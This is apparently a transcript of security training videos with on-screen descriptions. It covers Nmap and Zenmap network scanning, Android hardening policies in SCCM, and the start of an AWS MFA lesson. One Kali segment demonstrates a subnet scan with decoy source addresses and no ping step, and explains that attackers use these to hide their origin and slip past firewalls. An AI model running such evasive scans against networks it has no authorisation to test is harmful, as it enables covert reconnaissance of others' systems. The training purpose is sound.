I'm going to go ahead and click on that, and the first thing I have to do is determine
what the target is. Am I trying to scan a single host for vulnerabilities, a subset of
hosts, or the entire subnet? In this case, I'm going to put in 192.168.0, which is my
network, and then .1-254. I want to scan all host IP addresses on the 192.168.0
subnet.
[Video description begins] He types 192.168.0.1-254 in the Target combo box. The
command in the Command text box changes to nmap -T4 -A -v 192.168.0.1-254. [Video description ends]
Then I have to determine the scanning profile I'm going to use. Do I want to
perform an intense scan which would take longer than a quick scan?
[Video description begins] He clicks the Profile drop-down list box. A list of
options appears. It includes the Quick scan option. [Video description ends]
And notice when I choose a different profile it's going to be modifying the Nmap
command that is going to be executed.
[Video description begins] He hovers over the nmap -T4 -A -v 192.168.0.1-254
command in the Command text box. [Video description ends]
So if I choose Quick scan, it's changed ever so slightly.
[Video description begins] He selects the Quick Scan option. The nmap -T4 -A -v
192.168.0.1-254 command in the Command text box changes to nmap -T4 -F
192.168.0.1-254. [Video description ends]
And if you are familiar with Nmap command line syntax already, then you can go
ahead and pop it in here. And it will take it as you execute or run the scan, which
we do by clicking the Scan button in the upper-right, which I'll do now.
[Video description begins] He clicks the Scan button. The output appears in the
Nmap Output tab. The Host column header includes the hosts: 192.168.0.1,
192.168.0.2, 192.168.0.3, 192.168.0.5, 192.168.0.6, and 192.168.0.7. The output
displays the details of each host in a separate section. [Video description ends]
And after a moment, in the left-hand navigator, we can see it's discovered a number
of hosts that are up and running on the subnet.
[Video description begins] He selects the 192.168.0.2, 192.168.0.3, 192.168.0.5,
192.168.0.6, and 192.168.0.7 hosts. [Video description ends]
On the right, we can also see the Nmap Output where each host is separated with a
blank line.
[Video description begins] He highlights 192.168.0.1 in the output line: Nmap scan
report for 192.168.0.1. [Video description ends]
We've got sections for each host that list things like the IP address of the host and
port information, such as whether the port is open and listening.
[Video description begins] He highlights the entries of the table displayed in the
details of 192.168.0.1 in the output. This table has three column headers: PORT,
STATE, and SERVICE. The entries in the first row are: 53/tcp, open, and domain,
respectively. The entries in the second row are: 80/tcp, open, and http, respectively.
The entries in the third row are: 443/tcp, open, and https, respectively. The entries
in the fourth row are: 5000/tcp, open, and upnp, respectively. [Video description
ends]
Or whether it's filtered which normally means that it's being blocked by a firewall
rule.
[Video description begins] He highlights filtered in the output line: 8081/tcp
filtered blackice-icecap. [Video description ends]
We can also see the hardware or the MAC Address of the device and on the left, I
can also click on Services and view things from this perspective.
[Video description begins] He highlights 2C:99:24:5A:17:C0 in the output line:
MAC Address: 2C:99:24:5A:17:C0 (Arris Group). [Video description ends]
For example, I want to see all the jetdirect network printers out there.
[Video description begins] He clicks the Service button. The Service pane opens. It
includes the afp, blackice-icecap, dc, domain, http, http-proxy, https, ida-agent,
jetdirect, and microsoft-ds. [Video description ends]
So I can click jetdirect and I can see the IP here listening on TCP Port 9100 which is
normal for network printing.
[Video description begins] He clicks the jetdirect service. The Port / Hosts tab in
the fourth part shows a table with the column headers: Hostname, Port, Protocol,
State, and Version. The Hostname column header has the value, 192.168.0.5. The
Port column header has the value, 9100. The Protocol column header has the
value, tcp. The State column header has the value, open. The Version column
header has no value. [Video description ends]
And maybe I want to look for web servers so I could click on http.
[Video description begins] He clicks the http service. The Port / Hosts tab in the
fourth part shows a table with the column headers: Hostname, Port, Protocol,
State, and Version. The Hostname column header has the values, 192.168.0.1,
192.168.0.3, 192.168.0.5, 192.168.0.6, and 192.168.0.13. The Port column header
has the value, 80, for each row. The Protocol column header has the value, tcp, for
each row. The State column header has the value, open, for each row. The Version
column header has no value. [Video description ends]
Maybe there is only supposed to be one on the network, but here I see five listed.
And this is one of the reasons we conduct vulnerability scans, so that we can
identify weaknesses and harden our network environment.
[Video description begins] He hovers over the Hostname column header
values. [Video description ends]
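By the way, that same check for unexpected web servers can be run straight from the Nmap command line; a rough sketch using the demo's subnet:

# Report only the hosts on the subnet that have TCP port 80 open
nmap -p 80 --open 192.168.0.0/24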
The bad guys would use the same type of tool and techniques to perform
reconnaissance, to find weaknesses that they can exploit. So we want to make sure
we get to it before they do. We can also click the Topology tab here.
[Video description begins] The Topology tab displays three buttons, named Hosts
Viewer, Fisheye, and Controls and the diagram of the hosts found on the network.
The diagram shows the connections between the hosts on the network. The different
hosts on the network are 192.168.0.2, 192.168.0.20, 192.168.0.13, 192.168.0.252,
192.168.0.11, 192.168.0.9, 192.168.0.8, 192.168.0.5, 192.168.0.12, 192.168.0.7,
192.168.0.6, and 192.168.0.1. [Video description ends]
Now, I can't really see the devices here that it's found on my network. If I click
Fisheye, it spreads them out a little bit.
[Video description begins] The list of controls includes the Zoom control. [Video
description ends]
But I can also click on Controls, which shows me a list of controls over on the right-hand side of the screen. And one of the things I can do is actually zoom in.
[Video description begins] He zooms in the diagram using the Zoom
control. [Video description ends]
Now when I've done that, notice that I have got circles for each detected host and
they are different colors. Some are green, some are yellow, some are red. The idea
is that green means that it has less than three open ports that were discovered. But if
it's got between three and six open ports, it'll be yellow and red is not good because
it's got more than six open ports. And of course, the larger the circle, the more open
ports that were discovered. The little padlock means that there are some filtered
ports on that device normally due to firewall settings on a host-based firewall.
[Video description begins] He clicks the Host Details tab. It does not display
anything. [Video description ends]
We can also click Host Details over here to view specific host details, which we
could also trigger from the Topology.
[Video description begins] He clicks the Topology tab. He then clicks the Hosts
Viewer button. The Hosts Viewer window opens. It is divided into two parts. The
first part is the Hosts pane. It displays a list of hosts, which includes 192.168.0.6.
The second part contains the General, Services, and Traceroute tabs. The General
tab is selected. It contains three expandable sections, named General information,
Operating System, and Sequences. The General information section is expanded. It
contains the Address and Hostname drop-down list boxes. [Video description ends]
Actually, I'll do it from here, because if I click Host Viewer, I get a list of the
hosts.
[Video description begins] He hovers over the list of hosts in the Hosts
pane. [Video description ends]
Again, we now know what the color coding means, and so I could click on one of
them.
[Video description begins] He clicks the 192.168.0.6 host. The Address drop-down
list box shows the value, [ipv4] 192.168.0.6. The Hostname drop-down list box
does not show any value. [Video description ends]
We haven't done an intense scan, so we don't see any operating system info.
[Video description begins] He expands the Operating System expandable section. It
shows the message: No OS information. [Video description ends]
But if we go to Services, we'll see port information.
[Video description begins] He clicks the Services tab. It contains three tabs: Ports
(2), Extraports (98), and Special fields. The Ports (2) tab is selected by default. It
displays a table with five column headers: Port, Protocol, State, Service, and
Method. The Port column header has the values, 22 and 80. The Protocol column
header has the value, tcp, for all the rows. The State column header has the value,
open, for all the rows. The Service column header has the values, ssh and http. The
Method column header has the value, table, for all the rows. [Video description
ends]
And of course, if we've got three or fewer open ports, then that is when we have a
device or a host that will show up with a green color listed here.
[Video description begins] He closes the Hosts Viewer window. [Video description
ends]
We can also see any past scans; here is our current scan, which currently has a status
of Unsaved.
[Video description begins] He clicks the Scans tab. It shows two column headers:
Status and Command. The Status column header has the value, Unsaved. The
Command column header has the value, nmap -T4 -F 192.168.0.1-254. [Video
description ends]
So we can go to the scan menu and we can save the scan as an XML document.
[Video description begins] He clicks Save Scan in the Scan menu. The Save Scan
dialog box opens. It includes the Name text box, Select File Type drop-down list
box, and the Cancel and Save buttons. The Name text box contains the value, .xml.
The Select File Type drop-down list box shows the value, Nmap XML format
(.xml). [Video description ends]
So that we could perhaps establish a baseline of what is normal and what should be
on the network.
[Video description begins] He clicks the Cancel button, and the Save Scan dialog
box closes. [Video description ends]
And what is cool is that we can also go to the Tools menu and compare two scans to
see what has changed over time, such as the presence of a new machine on the
network that perhaps shouldn't be there.
[Video description begins] He clicks Compare Results in the Tools menu. The
Compare Results window opens. It contains two sections, A Scan and B Scan. Both
these sections includes a drop-down list box and the Open button. [Video
description ends]
So this is a pretty easy tool to use.
[Video description begins] He closes the Compare Results window. [Video
description ends]
And it's one of those things that we should run on a periodic basis to make sure we
know what is on the network and whether or not we've got too many
vulnerabilities.
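On the baseline idea, Nmap also ships with the ndiff utility, so the save-and-compare workflow can be scripted as well; this is just a sketch, and the file names are only examples:

# Save a baseline scan, and later a fresh scan, in Nmap XML format
nmap -T4 -F -oX baseline.xml 192.168.0.1-254
nmap -T4 -F -oX today.xml 192.168.0.1-254
# Report the hosts, ports, and services that changed between the two scans
ndiff baseline.xml today.xml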
Conduct a Vulnerability Assessment Using Linux
[Video description begins] Topic title: Conduct a Vulnerability Assessment Using
Linux. The presenter is Dan Lachance. [Video description ends]
In this demonstration, I'll conduct a network vulnerability scan from a Linux
station. I'm using Kali Linux, which is a Linux distribution that contains many
security tools including Nmap, which we can use to conduct a vulnerability scan.
[Video description begins] The root@kali: ~ command line window is open. The
root@kali:~# prompt is displayed. [Video description ends]
Here from the command line on Kali Linux, I'm going to run Nmap. And I'm just
going to give it a single IP address so that I can scan just a single host.
[Video description begins] He executes the command: nmap 192.168.0.1. The
scanning for 192.168.0.1 gets completed and the report is displayed in the output.
The prompt does not change. [Video description ends]
After a moment, we can see the scan is completed for, in this case, 192.168.0.1.
And we can see a number of ports that are listed as being open, such as TCP 53 for
DNS, which is used for transfers between DNS servers, and ports 80 and 443 for HTTP and HTTPS respectively.
[Video description begins] He highlights the table entries displayed in the output.
The table has three column headers: PORT, STATE, and SERVICE. The PORT
column header has the values: 53/tcp, 80/tcp, 443/tcp, and 5000/tcp. The STATE
column header has the value, open, for all the rows. The SERVICE column header
has the values: domain, http, https, and upnp. [Video description ends]
TCP port 5000 is for UPnP, which is one you probably want to close where you can,
unless you absolutely need Universal Plug and Play running. And then I
might also have some filtered ports which normally means a firewall is configured
to prevent that from being accessed. And there I can also see the MAC Address.
[Video description begins] He highlights filtered in the output lines: 8081/tcp
filtered blackice-icecap 8082/tcp filtered blackice-alerts. [Video description ends]
I'm going to clear the screen.
[Video description begins] The MAC address is 2C:99:24:5A:17:C0
(unknown). [Video description ends]
Because here from the Nmap command line what I also want to do is scan the
network and perform a few extra things.
[Video description begins] He executes the command: clear. The prompt does not
change. [Video description ends]
So I'm going to run nmap. And I'm going to do 192.168.0. Now, I could either put .1-254 here, or to scan the entire subnet, I could also put .0 and then the subnet mask
as the number of bits. This is CIDR notation. It's a /24, so a 24-bit subnet mask. In
other words, 255.255.255.0, which really means this is my network address,
192.168.0. So I'm going to scan the subnet. I'm going to scan for port 80, -p80.
Now remember, in Linux, lower and uppercase have different meanings, so make
sure you're careful about that. And I'm going to use the -D parameter, decoy.
What this will let me do is specify a couple of other IP addresses that this scan will
look like it originated from. So I'm just going to put in a couple of other random
IPs, doesn't matter which subnet that they're on or anything like that. And in
addition to my own IP, this is what it's going to look like the scan is coming from
as the scan is executing. So this is something that attackers would do when they're
performing reconnaissance.
And you'll find that if you want to perform an Nmap scan from outside of a
firewall that might be blocking ICMP traffic, and commands like ping and
traceroute use ICMP, you might want to also pass a -P0 here. And what this really means
is it tells Nmap to not send out initial ping messages like it normally does by
default. And this way the scan has a better chance of being able to get through
firewalls that might block ICMP type of ping traffic. So I'm going to go ahead and
press Enter to begin this scan.
[Video description begins] He executes the command: nmap 192.168.0.0/24 -p80 -D 1.1.1.1,1.1.1.3,192.168.0.46 -P0. The output displays the nmap scan report for
192.168.0.12, 192.168.0.13, 192.168.0.252, and 192.168.0.20. The prompt does not
change. [Video description ends]
And we can now see that the scan has completed. So we can see the Nmap scan
report for specific ports on a given MAC address and IP address.
[Video description begins] He highlights the output lines: Nmap scan report for
192.168.0.252 Host is up (0.073s latency). PORT 80/tcp STATE closed SERVICE
http MAC Address: 00:00:CA:01:02:03 (Arris Group). [Video description ends]
And by the way, if you're wondering what command line parameters are
available, you can view them by looking at the man page, the help
page.
[Video description begins] He executes the command: clear. The prompt does not
change. [Video description ends]
So man space nmap and then from here, I can go through the help system, navigate
through it, to get a description about how it works.
[Video description begins] He executes the command: man nmap. The Nmap
reference guide is displayed as output. [Video description ends]
And then eventually as we go further down, we'll start seeing all of the command
line parameters. And remember, that upper and lower case letters have a different
meaning.
[Video description begins] The Wi-Fi window is open. It is divided into six parts.
The first part is the menu bar. The second part is the toolbar. The third part
includes the Apply a display filter ... <Ctrl-/> search box. The fourth part contains
a table with the column headers: No., Time, Source, Destination, Protocol, Length,
and Info. The No. column header includes the values: 7110 and 7111. The Time
column header includes the values: 11.634610 and 11.634723. The Source column
header includes the value: 192.168.0.20. The Destination column header includes
the values: 1.1.1.1 and 1.1.1.3. The Protocol column header includes the value:
TCP. The Length column header includes the value: 54. The Info column header
includes the value: 80 -> 41701 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0. The fifth
part includes the statement: Transmission Control Protocol, Src Port: 80, Dst Port:
41701, Seq: 1, Ack: 1, Len: 0. The sixth part includes 0000 2c 99 24 5a 17 c0 18 56
80 c3 68 ba 08 00 45 00 ,.$Z...V ..h...E. [Video description ends]
While the scan was running, I was capturing network traffic on the same host from
which the scan was being run. And notice that we've got some listings here related
to 1.1.1.1 and 1.1.1.3, and there are plenty of other ones throughout the packet
capture, which were part of the decoy addresses that we wanted to make sure were
passed along with our Nmap scan.
[Video description begins] He scrolls through the table entries. [Video description
ends]
So that it looks like the scan came from a number of different hosts and not just our
specific IP address.
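If you want to verify the decoys yourself, starting a packet capture on the Kali box before the scan will show them; a minimal sketch, where the interface name eth0 and the file name are assumptions for your setup:

# Capture any traffic involving the decoy addresses while the Nmap scan runs; stop it with Ctrl+C and open the file in a protocol analyzer afterwards
tcpdump -i eth0 -w decoy_check.pcap 'host 1.1.1.1 or host 1.1.1.3'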
Mobile Device Access Control
[Video description begins] Topic title: Mobile Device Access Control. The
presenter is Dan Lachance. [Video description ends]
Most organizations these days allow their employees to use mobile devices for
increased productivity.
[Video description begins] Mobile Device Access Control [Video description ends]
That is not to say there is no risk in engaging in this activity. There is risk because
we've got an entry point for malware potentially, especially if people are using
smartphones also for personal use. So we have to consider the mobile devices and
the apps they're using, whether they're custom built by the organization or whether
they are standard off-the-shelf apps. And we can determine which ones should be
allowed to be used by users.
We then have to determine whether mobile devices are using things like certificate
authentication. That could be applicable for VPN access when people are not at the
office and want to use their smartphone to access sensitive systems owned by the
organization or sensitive data that results from the use of those systems. Mobile
device management, otherwise called MDM, allows us to centrally control the
security settings and to manage things like applications on mobile devices on a
large scale. So we can have a centralized device inventory so that we know which
devices are out there.
How many iOS devices, how many Android devices, and also, which apps are
installed on them, and how up to date they are with virus signatures and so on. So
we have centralized management as well as centralized reporting available as a
result of this. Now that is not to mention that we've got centralized configuration to
control all of these items as well. Organizations might allow users to bring their
own device.
[Video description begins] Mobile Device Usage [Video description ends]
Bring your own device, otherwise called BYOD, allows users to use their personal
smartphone for business use. Certainly, there is risk involved with this. But another
potential option is corporate owned personally enabled devices, otherwise called
COPE. This means that the company purchases and owns the device and allows
users to use it of course for business use as well as personal use. But the difference
is that the company gets to control things like the device type. They can all be the
same which allows for easier consistent device management.
Also, the organization can determine how hardened the devices are right from the
beginning, because the company has access to the device first. But what is the challenge with
this? Well, the challenge with using either bring your own device or corporate
owned personally enabled devices, which is very popular these days, is to make
sure we somehow keep personal and organizational apps and data and settings
separate from one another on the single device. And often with mobile device
management solutions, this is referred to as mobile device dual persona. Because
it's being used for personal use, and it's being used for business use. So what can
we do to harden mobile devices, ideally, centrally from our mobile device
management solution?
[Video description begins] Mobile Device Hardening [Video description ends]
Well, we can enable strong authentication, whether it's strong passwords or multi-factor authentication, MFA, perhaps where the user is sent a code through SMS text
messaging as they try to log in with a username and a password, or maybe their
device needs a PKI certificate. We should also consider enabling remote wipe. So
that if a device is lost or stolen, the IT team has the ability to wipe it so that any
sensitive data will not be available to whoever stole the device, for example. We
can also enable device tracking, whether it's through Internet connectivity or by cell
towers, and so on. This way, we can determine where the device is, if it's been lost
or stolen or to track employee locations.
Of course, this is possible with satellite technology through GPS, the Global
Positioning System, as well. Geofencing is another interesting option, where
essentially we can control which apps are available, or how they behave, or even
how security settings are applied, depending on the physical location of the user
device. So maybe a sensitive application can only be used when the user is at work
with their device. Once they leave the building, the app is no longer available.
And certainly on a personal level, we might have run into this. If we've gone
shopping somewhere, and all of a sudden we get a welcome text message in an app
from the mall, the shopping center. Or maybe we're told certain coupons are
available because we're in a certain location, and so on. That is all referred to as geofencing.
Other device hardening options include making sure that the mobile device has a
firewall installed. Not just at the network perimeter but every single computing
device should have a personal firewall configured appropriately as well as
antimalware scanning configured. We can also enable encryption on mobile
devices for data at rest, whether it's on the device itself or removable micro SD
card. We can also enable encryption for data in transit for that mobile device
through IPsec, which allows us to encrypt all network communications regardless
of the application being used. We could even use a VPN that the user could
authenticate to when they're working away from the office to give them a secure
tunnel over the Internet to resources available in the office. We can also disable a
number of settings.
Part of hardening anything is disabling things that are not needed in order to reduce
the attack surface. Things like disabling Bluetooth if we don't need it, disabling
connectivity to public Wi-Fi hotspots, preventing users or removing the ability for
them to install apps or perhaps limiting which apps they can install. Enabling GPS
tracking is sometimes good for remote tracking, but in another sense we also might
want to disable it. Such as for members of the military or law enforcement that
might use organizationally supplied smartphone devices. Also, we might disable
the camera or microphone for privacy reasons.
Finally, we can also enable data loss prevention, or DLP, through the installation of a
software agent on the mobile device that is controlled by a central management
solution. Data loss prevention means we want to prevent or minimize any sensitive
data from being leaked outside of the organization. So a software agent gets
installed on the device and centralized policies that we get to configure will
determine how sensitive data is treated. So for example, we might make sure that
users of a smartphone are unable to send e-mail attachments that contain
sensitive data to external e-mail addresses outside of the organization.
Configure Mobile Device Hardening Policies
[Video description begins] Topic title: Configure Mobile Device Hardening
Policies. The presenter is Dan Lachance. [Video description ends]
In this demonstration, I'll configure centralized mobile device hardening policies.
There are plenty of tools out there that let you do this, like MobileIron or Microsoft
System Center Configuration Manager, along with Microsoft Intune. So in this
case, we'll be using Microsoft System Center Configuration Manager. So here in
my Server 2016 installation, I've already installed SCCM, System Center
Configuration Manager. So I'm going to go ahead and fire up the System Center
Config Manager console.
[Video description begins] The System Center Configuration Manager window is
divided into four parts. The first part is the menu bar. The second part is the
address bar. The third part is divided into two sections. The first section is the
Administration pane. It contains the Overview root node, which includes the Cloud
Services subnode. The second section includes the Assets and Compliance and
Monitoring options. The fourth part is the content pane. It displays the
Administration page. It has two expandable sections. The first section is the
Navigation Index, and the second section is the Recent Alerts (0) - Last updated:
1/8/2019 10:24:37 AM. [Video description ends]
The next thing I need to do is to go into the Assets and Compliance workspace.
[Video description begins] He clicks the Assets and Compliance option. The Assets
and Compliance pane opens in the first section of the third part and the
Compliance Settings page opens in the content pane. The Assets and Compliance
pane contains the Overview root node. This node includes the Compliance Settings
subnode. [Video description ends]
So I've clicked on that in the bottom-left and then in the left hand navigator, I'll
expand Compliance Settings.
[Video description begins] The Compliance Settings subnode includes the
Configuration Items and Configuration Baselines options. [Video description ends]
I need to create what is called a configuration item that contains my mobile device
hardening settings.
[Video description begins] He clicks the Configuration Items option. The content
pane includes a table. This table has the column headers: Icon, Name, Type,
Device Type, Revision, Child, Relationships, User Setting, and Date
Modified. [Video description ends]
Then I need to add it to a configuration baseline and deploy that to a collection of
devices.
[Video description begins] He clicks the Configuration Baselines option. The
content pane includes a table and the Summary and Deployments tabs. The table
has the column headers: Icon, Name, Status, Deployed, User Setting, Date
Modified, Compliance Count, Noncompliance Count, Failure Count, and Modified
By. [Video description ends]
Then we'll be hardening our mobile environment. So I'm going to start by right-clicking on Configuration Items and choosing Create Configuration Item.
[Video description begins] He right-clicks the Configuration Items option and
selects the Create Configuration Item option. The Create Configuration Item
Wizard opens. It displays the General page. This page includes the Name text box,
Android and Samsung KNOX radio button, and the Next button. [Video description
ends]
I'm going to call this Harden Lollipop, because we're going to apply this to the
Android version 5 operating system which is called Lollipop. Android always has
great, yummy, sweet names for its operating system versions, like Marshmallow,
and in this case Lollipop.
[Video description begins] He types Harden Lollipop in the Name text box. [Video
description ends]
So down below, I'm going to choose Android and Samsung KNOX and then I'll
click Next.
[Video description begins] He selects the Android and Samsung KNOX radio
button. [Video description ends]
Then I can expand the Android operating system, and I can determine the specific
versions.
[Video description begins] The Supported Platforms page is displayed. It contains
the Android node. [Video description ends]
So maybe I want to exclude version 4, this is only for Android 5, and then Next.
[Video description begins] The Android node contains the Android KNOX
Standard 4.0 and higher, Android 4, and Android 5 checkboxes. These are
selected. [Video description ends]
Then I can determine the types of settings I'm interested in.
[Video description begins] He clears the Android KNOX Standard 4.0 and higher
and Android 4 checkboxes. [Video description ends]
Well, Compliant and Noncompliant Apps (Android), that is a big one.
[Video description begins] The Device Settings page is displayed. It includes the
Select all, Security, Encryption, and Compliant and Noncompliant Apps (Android)
checkboxes. [Video description ends]
Because a lot of security breaches could potentially stem from people installing and
running apps that are not allowed to be run on the machine.
[Video description begins] He selects the Compliant and Noncompliant Apps
(Android) checkbox. [Video description ends]
They might contain malware, they could reduce the security of the device. So I'm
actually going to turn on the check mark for Encryption, Security, and Password as
well, and then I'll click Next.
[Video description begins] The Password page is displayed. It includes the Require
password settings on devices drop-down list box, Minimum password length
(characters) and Password expiration in days checkboxes, and the Idle time before
device is locked drop-down list box. Each of the checkboxes has a spin box
attached to them. The Minimum password length (characters) and Password
expiration in days checkboxes and the Idle time before device is locked drop-down
list box are disabled. [Video description ends]
First thing, we've got password settings. So I'm going to go ahead and choose
Required.
[Video description begins] He selects the Required option in the Require password
settings on devices drop-down list box. The Minimum password length (characters)
and Password expiration in days checkboxes and the Idle time before device is
locked drop-down list box get enabled. [Video description ends]
And maybe I would set an option such as the fact that the minimum password
length needs to be at least 8 characters, and maybe password expiration in days,
maybe 7.
[Video description begins] He selects the Minimum password length (characters)
checkbox and sets the value of the spin box, adjacent to it, to 8. [Video description
ends]
This would all be done in accordance with organizational security policies.
[Video description begins] He selects the Password expiration in days checkbox
and sets the value of the spin box, adjacent to it, to 7. [Video description ends]
There should be no guesswork here when I'm configuring it at this level. Maybe the
idle time before the device is locked, 5 minutes. So you get the idea, we can
configure these types of items.
[Video description begins] He selects the 5 minutes option in the Idle time before
device is locked drop-down list box. [Video description ends]
I'll go ahead and click Next. Then I can determine for example, in this case whether
the camera is Allowed or Prohibited.
[Video description begins] The Security page is displayed. It includes the Camera
drop-down list box. [Video description ends]
Maybe Prohibited if it's only work use and we have no need of the camera for work
purposes. I'll click Next.
[Video description begins] He selects the Prohibited option in the Camera drop-down list box. [Video description ends]
And maybe file encryption on the device, I'll apply that as being turned on.
[Video description begins] The Encryption page is displayed. It includes the File
encryption on device drop-down list box. [Video description ends]
Finally, my Compliant and Noncompliant Apps (Android).
[Video description begins] He selects the On option in the File encryption on
device drop-down list box. [Video description ends]
Well, I can click Add; let's say the Google Authenticator app is going to be an
important part of an Android device being compliant with these security
settings.
[Video description begins] He clicks the Next button. The Android App Compliance
page is displayed. It includes the Add button and the Noncompliant apps list: Use
this list to specify the Android apps that will be reported as noncompliant and the
Compliant apps list: Use this list to specify the Android apps that users are allowed
to install. Any other apps will be reported as noncompliant radio buttons. The
Noncompliant apps list: Use this list to specify the Android apps that will be
reported as noncompliant radio button is selected by default. [Video description
ends]
So I have to put in the App URL.
[Video description begins] He clicks the Add button. The Add App to the
Noncompliant List dialog box opens. It contains the Name, Publisher, and App
URL text boxes and the Add and Cancel buttons. [Video description ends]
Well, all I have to do for that is go to the Google Play Store.
[Video description begins] He types Google Authenticator in the Name text
box. [Video description ends]
I've already searched up the Google Authenticator, so I can just go ahead and copy
the URL from the URL box in my browser. And then I can simply paste that into
the App URL. So I'll go ahead and add that one, of course we could add more.
[Video description begins] He clicks the Add button, and the Add App to the
Noncompliant List dialog box closes. [Video description ends]
And I can determine whether I want to look at this from a noncompliant or a
compliant perspective.
[Video description begins] He hovers over the Noncompliant apps list: Use this list
to specify the Android apps that will be reported as noncompliant and the
Compliant apps list: Use this list to specify the Android apps that users are allowed
to install. Any other apps will be reported as noncompliant radio buttons. [Video
description ends]
So if it's noncompliant, it means use this list to specify the apps that will be
reported as noncompliant. Well, I want this to be compliant.
[Video description begins] He selects the Compliant apps list: Use this list to
specify the Android apps that users are allowed to install. Any other apps will be
reported as noncompliant radio button. [Video description ends]
So if they've got the Google Authenticator, that is good for additional
authentication factors for security, then I'll click Next.
[Video description begins] The Platform Applicability page is displayed. [Video
description ends]
And I'm not going to add any exclusions, click Next, and Next again.
[Video description begins] The Summary page is displayed. [Video description
ends]
And finally after a moment, we will have created our configuration item
[Video description begins] The Progress page is displayed. [Video description
ends]
so that we can start to harden our mobile device environment.
[Video description begins] The Completion page is displayed. [Video description
ends]
Close out of that and let's just go back to the config manager console.
[Video description begins] He clicks the Close button, and the Create
Configuration Item Wizard closes. [Video description ends]
And there it is, Harden Lollipop. We see the config item.
[Video description begins] The Icon column displays the icon. The Name column
header has the value, Harden Lollipop. The Type column header has the value,
General. The Device Type column header has the value, Mobile. The Revision
column header has the value, 1. The Child column header has the value, No. The
Relationships column header has the value, No. The User Setting column header
has the value, No. The Date Modified column header has the value, 1/8/2019 10:28
AM. [Video description ends]
So I'm going to go ahead here and go under Configuration Baselines and I'm going
to build a new one and add config items to it.
[Video description begins] He right-clicks the Configuration Baselines option and
selects the Create Configuration Baseline option. The Create Configuration
Baseline dialog box opens. It includes the Name text box, the Add drop-down
button, and the OK button. [Video description ends]
I'm going to call this Harden Android Baseline.
[Video description begins] He types Harden Android Baseline in the Name text
box. [Video description ends]
And then down below, I'm going to click Add > Configuration Items and I'll choose
the Harden Lollipop item we just created and I'll add that. Click OK and OK.
[Video description begins] He clicks the Add drop-down button and selects the
Configuration Items option. The Add Configuration Items dialog box opens. It is
divided into two parts. The first part is Available configuration items. The second
part is Configuration items that will be added to this configuration baseline.
Available configuration items includes a table and the Add button. The table has
five column headers: Name, Type, Latest Revision, Description, and Status. The
Name column header includes the value, Harden Lollipop. The Type column
header includes the value, General. The Latest Revision column header includes
the value, 1. The Description column header has no value. The Status column
header includes the value, Enabled. Configuration items that will be added to this
configuration baseline includes a table and the OK button. The table has five
column headers: Name, Type, Latest Revision, Description, and Status. These
columns do not have any value. [Video description ends]
So now, we've got the configuration item added to our baseline.
[Video description begins] He selects the Harden Lollipop value in the Name
column header and clicks the Add button. The Name, Type, Latest Revision, and
Status columns headers of the table in Configuration items that will be added to
this configuration baseline get populated with the values, Harden Lollipop,
General, Revision 1, and Enabled, respectively. He then clicks the OK button to
close the Add Configuration Items dialog box. [Video description ends]
Next thing to do is to right-click on the baseline and to deploy it to a collection of
mobile devices.
[Video description begins] He clicks the OK button to close the Create
Configuration Baseline dialog box. [Video description ends]
A collection is just a group of devices.
[Video description begins] The Icon column displays the icon. The Name column
header includes the value, Harden Android Baseline. The Status column header
includes the value, Enabled. The Deployed column header includes the value, No.
The User Setting column header includes the value, No. The Date Modified column
header includes the value, 1/8/2019 10:28 AM. The Compliance Count column
header includes the value, 0. The Noncompliance Count column header includes
the value, 0. The Failure Count column header includes the value, 0. The Modified
By column header includes the value, FAKEDOMAIN. [Video description ends]
And here in config manager, I can specify the collection that I want to deploy this
configuration baseline to.
[Video description begins] He right-clicks the Harden Android Baseline value in
the Name column header and selects the Deploy option. The Deploy Configuration
Baselines dialog box opens. It includes the Collection text box, the Remediate
noncompliant rules when supported checkbox, and the Run every spin box. A
Browse button is present adjacent to the Collection text box. The Allow remediation
outside the maintenance window checkbox is present below the Remediate
noncompliant rules when supported checkbox. It is disabled. [Video description
ends]
So I'll go ahead and click Browse. And here, I'm going to go into Device
Collections.
[Video description begins] The Select Collection dialog box opens. It is divided into
three parts. The first part contains a drop-down list box and the Root folder. The
second part contains the Filter search box and a table with the column headers:
Name and Member Count. The Name column header includes the value, All Users.
The Member Count column header includes the value, 2. The third part includes
the OK button. [Video description ends]
I might have a specific collection for mobile devices. There is a built-in one here
called All Mobile Devices.
[Video description begins] He clicks the drop-down list box in the first part and
selects the Device Collections option. The Name column header includes the value,
All Mobile Devices. The Member Count column header includes the value,
0. [Video description ends]
I don't have any mobile devices being managed by SCCM here yet. But if you did,
you would see a numeric value here other than 0 under the Member Count for the
All Mobile Devices collection, click OK. Also, I'm going to choose to remediate
noncompliance when it's found.
[Video description begins] The Select Collection dialog box closes. [Video
description ends]
So if the camera is enabled for example, then I'm going to choose to remediate that
by disabling the camera.
[Video description begins] He selects the Remediate noncompliant rules when
supported checkbox. The Allow remediation outside the maintenance window
checkbox gets enabled. [Video description ends]
I'm going to run this compliance check against these mobile devices every day.
[Video description begins] He sets the value of the Run every spin box to 1. [Video
description ends]
And then I'm going to click OK. And now if I select our Android baseline
hardening item, I can go down to Deployments here at the bottom.
[Video description begins] The Deploy Configuration Baselines dialog box
closes. [Video description ends]
And I can see that it's been deployed to the All Mobile Devices collection.
[Video description begins] The Deployments tab includes a table with the column
headers: Icon, Collection, Compliance %, Deployment Start Time, and Action. The
Icon column header displays the icon image. The Collection column header has the
value, All Mobile Devices. The Compliance % column header has the value, 0.0.
The Deployment Start Time column header has the value, 1/8/2019 10:29 AM. The
Action column header has the value, Remediate. [Video description ends]
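For reference, Configuration Manager also has a PowerShell module that can script the baseline and deployment steps we just clicked through. Treat this strictly as a hedged sketch: the site code PS1 is a placeholder, and the cmdlet and parameter names beyond New-CMBaseline are from memory, so verify them with Get-Help in your own environment before relying on them:

# Load the ConfigMgr module from the admin console install and switch to the site drive (PS1 is a placeholder site code)
Import-Module "$($env:SMS_ADMIN_UI_PATH)\..\ConfigurationManager.psd1"
Set-Location 'PS1:'
# Create the baseline; adding the Harden Lollipop configuration item and deploying it to the
# All Mobile Devices collection can also be scripted, but check Get-Help Set-CMBaseline and
# Get-Help New-CMBaselineDeployment for the exact parameters in your ConfigMgr version
New-CMBaseline -Name 'Harden Android Baseline'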
Enable a Smartphone as a Virtual MFA Device
[Video description begins] Topic title: Enable a Smartphone as a Virtual MFA
Device. The presenter is Dan Lachance. [Video description ends]
These days, multi-factor authentication is all the rage when it comes to securing
user accounts, especially using an out-of-band mechanism to communicate codes
such as to a smartphone with an app installed. So in this example, I'm going to
enable a smartphone as a virtual MFA or multi-factor authentication device for use
with Amazon Web Services.
